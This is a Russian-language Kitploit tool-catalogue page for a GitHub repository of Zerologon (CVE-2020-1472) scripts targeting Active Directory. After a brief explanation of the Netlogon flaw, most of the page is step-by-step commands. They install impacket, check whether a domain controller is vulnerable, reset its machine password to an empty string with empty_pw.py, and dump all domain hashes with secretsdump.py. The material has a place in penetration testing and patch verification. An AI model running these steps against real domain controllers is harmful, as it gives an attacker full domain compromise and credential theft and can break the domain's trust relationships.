Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zerologon — Скрипты для тестирования и эксплуатации уязвимости Zerologon (CVE-2020-1472) в Active Directory, позволяющие сброс пароля и дамп хэшей контроллеров домена. | Kitploit
Инструменты/GitHubGitHub/carlos55ml/zerologon
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на Проникновение
GitHubcarlos55ml/zerologon

zerologon

Скрипты для тестирования и эксплуатации уязвимости Zerologon (CVE-2020-1472) в Active Directory, позволяющие сброс пароля и дамп хэшей контроллеров домена.

Репозиторий
244 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Zerologon

Набор скриптов для тестирования и эксплуатации уязвимости Zerologon (CVE-2020-1472)


баннер

Что это?

ZeroLogon — это уязвимость, которая позволяет нам эксплуатировать криптографическую ошибку в протоколе удаленного входа в систему Netlogon (MS-NRPC) Microsoft Active Directory, который позволяет пользователям входить на серверы с использованием NTLM.


Предварительные шаги

Перед выполнением эксплойта мы должны знать, что нам нужна другая версия impacket, для этого мы сделаем следующее.

apt remove --purge impacket-scripts python3-impacket

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

pip install .


PoC (Подтверждение концепции)

git clone https://github.com/Nekoox/zerologon.git

cd zerologon

pip install -r requirements.txt

Проверка, уязвим ли целевой контроллер домена для Zerologon.

python3 tester.py <DC-NAME> <ip-address>

В случае, если целевой контроллер домена уязвим, появится сообщение «Success! DC can be fully compromised by a Zerologon attack.»

В противном случае, то есть если целевой контроллер домена не уязвим, так как дыра в безопасности была исправлена, мы получим следующее сообщение «Attack failed. Target is probably patched.»


Смена пароля уязвимого контроллера домена на пустую строку.

python3 empty_pw.py <DC-NAME> <ip-address>

Если контроллер домена уязвим, после запуска эксплойта у него не должно быть пароля.

Дамп хэшей контроллера домена.

> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>

Выполнив это, мы сможем увидеть все хэши домена без каких-либо учетных данных.

Скачать инструмент